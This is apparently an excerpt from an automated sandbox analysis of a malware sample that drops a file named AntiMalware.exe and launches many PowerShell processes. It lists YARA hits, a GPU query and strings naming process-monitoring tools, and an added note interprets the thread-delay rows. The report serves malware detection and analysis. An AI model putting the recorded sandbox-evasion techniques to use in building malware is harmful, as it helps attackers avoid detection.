                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Process information set: NOOPENFILEERRORBOX (43 identical entries)

                            Malware Analysis System Evasion

                            Source: Yara match File source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara match File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Source: Yara match File source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Source: ZzOTKK2V8l.exe, AntiMalware.exe.0.dr Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe Memory allocated: E50000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe Memory allocated: 1B5A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Memory allocated: 1050000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Memory allocated: 1B7E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Memory allocated: 1500000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Memory allocated: 1B650000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (24 identical entries)
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                            Note: 922337203685477 is 2^63 ticks of 100 ns expressed in milliseconds (Int64.MaxValue / 10^4), the largest delay a 64-bit timeout can hold, i.e. an effectively infinite wait; the sleep-time values -1844674407370954, -2767011611056431 and -3689348814741908 further down are exact 2x, 3x and 4x multiples of it, so those threads blocked with that timeout two, three and four times. Such rows record blocked worker threads, typical of .NET hosts, which is why they appear for every powershell.exe instance in the chain and not only for the RAT binary. The bounded sleep loops (thread sleep count > 30), the Win32_VideoController query and the TASKMGR.EXE / PROCESSHACKER.EXE strings are the rows in this section that carry evasion signal on their own.
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4820Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2651Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1283Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4311Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1191Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4585Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 988Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5460
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1497
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWindow / User API: threadDelayed 6113
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWindow / User API: threadDelayed 3733
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4756
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5574
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4815
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5180
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1511
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4930
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1968
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5318
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1689
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe TID: 5272 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep count: 4820 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep count: 2651 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 | Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752 | Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 | Thread sleep count: 4872 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692 | Thread sleep count: 1283 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828 | Thread sleep time: -1844674407370954s >= -30000s (2 identical entries)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep count: 4311 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep count: 1191 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 5784 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3480 | Thread sleep count: 4585 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 | Thread sleep count: 988 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908 | Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760 | Thread sleep count: 5460 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 | Thread sleep count: 1497 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824 | Thread sleep time: -30000s >= -30000s
